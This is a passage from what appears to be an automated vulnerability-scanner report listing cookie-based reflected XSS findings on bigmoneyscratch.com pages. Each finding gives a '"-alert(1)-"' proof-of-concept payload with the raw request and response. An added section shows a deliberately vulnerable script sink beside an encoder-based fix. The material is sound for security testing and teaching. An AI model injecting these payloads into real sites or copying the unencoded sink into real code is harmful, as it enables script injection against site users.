Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PMeda30"-alert(1)-"17b8fe426b3; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:05:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMeda30"-alert(1)-"17b8fe426b3; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:04 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:04 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:04 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:04 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:04 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49469


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMeda30"-alert(1)-"17b8fe426b3";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.225. http://www.bigmoneyscratch.com/Responsible.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /Responsible.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eebb2"-alert(1)-"fa62934d047 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FMeebb2"-alert(1)-"fa62934d047; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:08:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:46 GMT; path=/
Set-Cookie: BO=FMeebb2"-alert(1)-"fa62934d047; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:46 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:46 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:46 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:46 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52867


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMeebb2"-alert(1)-"fa62934d047";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.226. http://www.bigmoneyscratch.com/Responsible.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /Responsible.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5946a"-alert(1)-"7675b07c96b was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM5946a"-alert(1)-"7675b07c96b; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:08:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM5946a"-alert(1)-"7675b07c96b; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:13 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:13 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:13 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:13 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:13 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52867


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM5946a"-alert(1)-"7675b07c96b";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.227. http://www.bigmoneyscratch.com/SecurityAndPrivacy.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /SecurityAndPrivacy.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae4cb"-alert(1)-"dee9fdf9e7a was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FMae4cb"-alert(1)-"dee9fdf9e7a; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:08:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:23 GMT; path=/
Set-Cookie: BO=FMae4cb"-alert(1)-"dee9fdf9e7a; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:23 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:23 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:23 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:23 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46640


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMae4cb"-alert(1)-"dee9fdf9e7a";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.228. http://www.bigmoneyscratch.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /SecurityAndPrivacy.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 248d6"-alert(1)-"a6b9fa5a2fb was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM248d6"-alert(1)-"a6b9fa5a2fb; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:08:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM248d6"-alert(1)-"a6b9fa5a2fb; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:05 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:05 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:05 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:05 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:05 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46640


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM248d6"-alert(1)-"a6b9fa5a2fb";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.229. http://www.bigmoneyscratch.com/Terms.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /Terms.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4217c"-alert(1)-"39848cc3718 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Terms.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM4217c"-alert(1)-"39848cc3718; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:08:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:58 GMT; path=/
Set-Cookie: BO=FM4217c"-alert(1)-"39848cc3718; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:58 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:58 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:58 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:58 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 109535


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM4217c"-alert(1)-"39848cc3718";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.230. http://www.bigmoneyscratch.com/Terms.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /Terms.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fcb8"-alert(1)-"5c11f941 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
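The same sink recurs in every finding in this group (3.230 through 3.240): the RegistrationMode and BO cookie values are written verbatim into `var strRegistrationMode = "..."` and `var strBonusOption = "..."` inside a script block, so a single `"` in the cookie ends the string and whatever follows is executed. The example below is added here and is not code from the report or from the scanned sites; it is JavaScript rather than the ASP.NET the sites run on, because it lets the emitted script be executed and observed directly. It reconstructs the two-line init block from the response snippets, emits it once unencoded and once through a JavaScript-string-context encoder that turns every character outside a small safe set into a `\uXXXX` escape, then runs both with a stub standing in for `window.alert` to show that the report's payload fires in the first and is inert in the second. The `isValidOptionCode` allow-list is an assumption: the report only shows the values `PM` and `FM`, so the real set of valid codes must be substituted.

```javascript
// Added example (not from the XSS.CX report or the scanned sites).
// Shows the script-context sink from findings 3.230-3.240 beside a
// hardened version, using the payload shape the report submitted.

// Encode every character that could end or alter a JS string literal as a
// \uXXXX escape. Encoding '<', '>' and '/' as well keeps "</script>" inert
// when the string is inlined in an HTML <script> block.
function jsStringEncode(value) {
  return String(value).replace(/[^A-Za-z0-9_.,\- ]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return '\\u' + code.toString(16).padStart(4, '0');
  });
}

// The init block as the scanned pages emit it (reconstructed from the
// response snippets): cookie values land directly inside double quotes.
function renderInitScriptVulnerable(registrationMode, bonusOption) {
  return [
    'var strRegistrationMode = "' + registrationMode + '";',
    'var strBonusOption = "' + bonusOption + '";',
  ].join('\n');
}

// Same block with each value passed through the encoder first.
function renderInitScriptHardened(registrationMode, bonusOption) {
  return [
    'var strRegistrationMode = "' + jsStringEncode(registrationMode) + '";',
    'var strBonusOption = "' + jsStringEncode(bonusOption) + '";',
  ].join('\n');
}

// Execute an emitted block the way a browser would, with a counting stub in
// place of window.alert so we can tell whether injected code ran, and
// return the values the two variables ended up holding.
function runInitScript(script) {
  let alertCalls = 0;
  const alert = () => { alertCalls += 1; };
  const fn = new Function(
    'alert',
    script + '\nreturn [strRegistrationMode, strBonusOption];'
  );
  const [registrationMode, bonusOption] = fn(alert);
  return { registrationMode, bonusOption, alertCalls };
}

// Defence in depth: the report shows these cookies carrying short option
// codes ("PM", "FM"). The exact valid set is not known from the report, so
// this pattern is an assumption; replace it with the real allow-list.
const OPTION_CODE = /^[A-Z]{1,8}$/;
function isValidOptionCode(value) {
  return OPTION_CODE.test(String(value));
}

// Usage with the RegistrationMode payload from finding 3.230.
const payload = 'PM8fcb8"-alert(1)-"5c11f941';
const vulnerableRun = runInitScript(renderInitScriptVulnerable(payload, 'FM'));
const hardenedRun = runInitScript(renderInitScriptHardened(payload, 'FM'));
console.log('vulnerable:', vulnerableRun); // alertCalls: 1, registrationMode: NaN
console.log('hardened:  ', hardenedRun);   // alertCalls: 0, registrationMode === payload
console.log('allow-list:', isValidOptionCode('PM'), isValidOptionCode(payload)); // true false
```

In the vulnerable run the emitted line becomes `"PM8fcb8"-alert(1)-"5c11f941"`, a subtraction expression that calls `alert` and leaves `NaN` in the variable; in the hardened run the quote and parentheses arrive as `\u0022`, `\u0028` and `\u0029`, the round trip returns the original string unchanged, and nothing executes. On .NET 4 and later `HttpUtility.JavaScriptStringEncode` performs this encoding; the `X-AspNet-Version: 2.0.50727` header in these responses indicates an older runtime, where the Microsoft AntiXSS library's `JavaScriptEncode` fills the same role. Two details of these responses sharpen the report's caveat about cookie delivery: the application re-issues the injected cookie with a three-year expiry scoped to the whole domain, so one successful injection re-fires on every page carrying this init block (the report lists Terms.aspx, UnderAge.aspx, the hopa.com root and several info.crazyscratch.com pages), and the pages are served over plain HTTP with no Secure attribute, so any network-position attacker can plant that cookie.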

Request

GET /Terms.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM8fcb8"-alert(1)-"5c11f941; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:08:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM8fcb8"-alert(1)-"5c11f941; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:18 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:18 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:18 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:18 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:18 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 109532


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM8fcb8"-alert(1)-"5c11f941";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.231. http://www.bigmoneyscratch.com/UnderAge.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /UnderAge.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 233fb"-alert(1)-"5a158f0a2c was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM233fb"-alert(1)-"5a158f0a2c; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:09:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:09:44 GMT; path=/
Set-Cookie: BO=FM233fb"-alert(1)-"5a158f0a2c; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:09:44 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:09:44 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:09:44 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:09:44 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45871


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM233fb"-alert(1)-"5a158f0a2c";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.232. http://www.bigmoneyscratch.com/UnderAge.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /UnderAge.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 530ff"-alert(1)-"7f555105e68 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM530ff"-alert(1)-"7f555105e68; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:08:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM530ff"-alert(1)-"7f555105e68; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:58 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:58 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:58 GMT; path=/
